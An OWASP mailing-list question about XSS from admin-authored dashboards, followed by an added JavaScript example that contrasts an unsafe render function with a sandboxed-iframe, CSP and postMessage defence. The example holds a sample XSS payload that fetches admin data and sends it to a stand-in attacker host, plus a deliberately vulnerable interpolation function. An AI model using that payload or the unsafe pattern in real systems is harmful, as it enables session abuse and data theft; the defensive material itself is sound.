[Owasp-leaders] Help Required : Best Practices against XSS on custom UI creation

Dibyendu Sikdar dibyendu.coder at gmail.com
Mon Nov 28 13:24:40 UTC 2016


Hi Experts,

Recently I have come across some projects where the application allows the
admin to code and create custom dashboards using HTML5, JavaScript and CSS.

Now all the admins have access to these dashboards. And because it
allows JS to be used, a rogue admin can put an XSS payload in any of
these dashboards and perform malicious activities which can affect other
admins.

What are some best practices you can recommend here?

-- 
*Thanks and Regards,*
*Dibyendu Sikdar*
*https://www.linkedin.com/in/dibsyhex*
*@dibsyhex*
*OWASP Project Leader *
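An added example, not part of the mailing-list post or any project mentioned in it, that shows the usual answer to this question in code: when admin-authored JavaScript is a feature, output encoding cannot be the defence, so the dashboard has to run under a different origin than the admin session. The first function shows the vulnerable pattern (saved markup interpolated into the admin app's own page); the rest embed the dashboard in a sandboxed iframe served from a separate cookie-less origin, send a matching Content-Security-Policy with it, and validate the postMessage bridge through which the host hands data to the frame. The origins, paths, dataset names and message shape are assumptions for illustration.

```javascript
// Added example (not from the original post): isolating admin-authored
// dashboards so their scripts cannot act as another admin.
// Origins, paths and the message shape are assumptions for illustration.

const APP_ORIGIN = "https://admin.example.com";            // assumed admin app origin
const SANDBOX_ORIGIN = "https://dash-sandbox.example.net"; // assumed separate, cookie-less origin

// Constructed sample: what a rogue admin might save as a "dashboard".
const ROGUE_DASHBOARD = {
  id: "sales-q4",
  html:
    '<h1>Sales</h1><script>fetch("/api/admins").then(r => r.text())' +
    '.then(t => { location = "https://attacker.example/?d=" + btoa(t); });</script>',
};

// VULNERABLE: the saved markup lands in the admin app's own document, so the
// script runs with the session of whichever admin opens the dashboard.
function renderDashboardUnsafe(dashboard) {
  return `<div class="dashboard">${dashboard.html}</div>`;
}

// Minimal attribute-context encoder for values placed inside double quotes.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// HARDENED: the app page only embeds a frame that points at the sandbox origin.
// sandbox="allow-scripts" without allow-same-origin gives the frame an opaque
// origin: no cookies, no DOM access to the parent, no credentialed requests.
function renderDashboardHost(dashboard) {
  const src = `${SANDBOX_ORIGIN}/dashboards/${encodeURIComponent(dashboard.id)}`;
  return `<iframe sandbox="allow-scripts" src="${escapeAttr(src)}" ` +
         `referrerpolicy="no-referrer" title="${escapeAttr(dashboard.id)}"></iframe>`;
}

// Headers the sandbox origin sends with the raw dashboard document. The CSP
// sandbox directive keeps the isolation even if the URL is opened directly,
// and frame-ancestors stops other sites from framing the dashboard.
function sandboxResponseHeaders() {
  return {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": [
      "sandbox allow-scripts",
      "default-src 'none'",
      "script-src 'unsafe-inline'",   // admin-authored inline JS is the feature
      "style-src 'unsafe-inline'",
      "img-src data:",
      "connect-src 'none'",           // data arrives via postMessage, not fetch
      `frame-ancestors ${APP_ORIGIN}`,
    ].join("; "),
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
  };
}

// Messages from the frame must be checked by source window (the origin of a
// sandboxed frame is the string "null", so it cannot identify the sender) and
// limited to an allow-list of datasets the dashboard may read.
function isTrustedDashboardMessage(event, frameWindow, allowedDatasets) {
  if (event.source !== frameWindow) return false;
  if (event.origin !== "null") return false;
  const msg = event.data;
  if (!msg || typeof msg !== "object") return false;
  if (msg.type !== "requestData") return false;
  return typeof msg.dataset === "string" && allowedDatasets.includes(msg.dataset);
}

// Host-side bridge (browser only): wires the check above to a real frame.
function attachDashboardBridge(frame, datasets) {
  window.addEventListener("message", (event) => {
    if (!isTrustedDashboardMessage(event, frame.contentWindow, Object.keys(datasets))) return;
    // An opaque origin cannot be named, so "*" is the only usable target;
    // the contentWindow reference already pins the recipient to this frame.
    frame.contentWindow.postMessage(
      { type: "data", dataset: event.data.dataset, rows: datasets[event.data.dataset] },
      "*",
    );
  });
}
```

The rogue payload still executes inside the frame, but it does so with an opaque origin and no session, so `fetch("/api/admins")` gets no cookies and the frame cannot reach the parent document; what the dashboard can see is exactly the datasets the host chooses to post to it. The sandbox origin must never set cookies or accept credentials, and the host should not add `allow-same-origin` to the sandbox attribute, since that single token would hand the script the sandbox origin's identity back.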

